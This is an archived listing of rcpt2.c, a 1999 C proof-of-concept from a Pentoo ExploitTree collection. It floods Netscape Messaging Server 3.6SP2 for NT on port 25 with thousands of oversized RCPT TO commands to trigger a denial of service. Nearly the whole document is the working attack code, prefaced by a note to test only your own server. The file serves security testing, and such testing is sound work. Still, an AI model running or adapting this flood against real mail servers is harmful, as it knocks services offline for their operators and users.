home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
mail
/
netscape
/
rcpt2.c
< prev
Wrap
C/C++ Source or Header
|
2005-02-12
|
3KB
|
176 lines
/***************************************************************
You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
whether vulnerable for too much RCPT TO or not.
by Nobuo Miwa, LAC Japan 28th Oct. 1999
http://www.lac.co.jp/security/
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define STR_HELO "HELO rcpt2\n"
#define STR_MAILFROM "MAIL FROM:rcpt2\n"
#define RCPT2_LENGTH 8000
#define RCPT2_NUMBER 10000
int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
int port=25, sd, rt ;
long li ;
struct hostent *he;
si->sin_addr.s_addr = inet_addr(hostIPaddr);
si->sin_family = AF_INET;
si->sin_port = htons (port);
sd = socket (si->sin_family, SOCK_STREAM, 0);
if (sd == -1) return (-1);
rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
if ( rt < 0 ) {
close(sd);
return(-1);
}
return(sd) ;
}
void sendRCPT2(int sd)
{
char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
int rt, i;
memset( tmpStr, 0, sizeof(tmpStr) ) ;
recv( sd, tmpStr, sizeof(tmpStr), 0 );
printf("%s",tmpStr);
printf("%s",STR_HELO);
send( sd, STR_HELO, strlen(STR_HELO), 0 );
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
if ( rt>0 ) printf("%s",tmpStr);
printf("%s",STR_MAILFROM);
send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
if ( rt>0 ) printf("%s",tmpStr);
strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
while ( RCPT2_LENGTH-strlen(rcptStr)>10 )
strcat( rcptStr, "aaaaaaaaaa") ;
strcat( rcptStr, "\n" );
for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr));
send( sd, rcptStr, strlen(rcptStr), 0 );
rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
strncpy( strn, tmpStr, 60 ) ;
if ( rt>0 ) printf("%s \n",strn);
}
return;
}
int main (int argc, char *argv[])
{
char hostIPaddr[80], *cc, *pfft;
int sd = 0;
struct sockaddr_in si;
printf("You can use ONLY for YOUR Messaging Server 3.6\n");
if (argc != 2) {
printf("Usage: %s IPaddress \n",argv[0]);
exit(1);
} else
strcpy (hostIPaddr, argv[1]);
sd = openSocket(&si,hostIPaddr);
if (sd < 1) {
printf("failed!\n");
exit(-1);
}
sendRCPT2( sd );
close (sd);
exit(0);
}
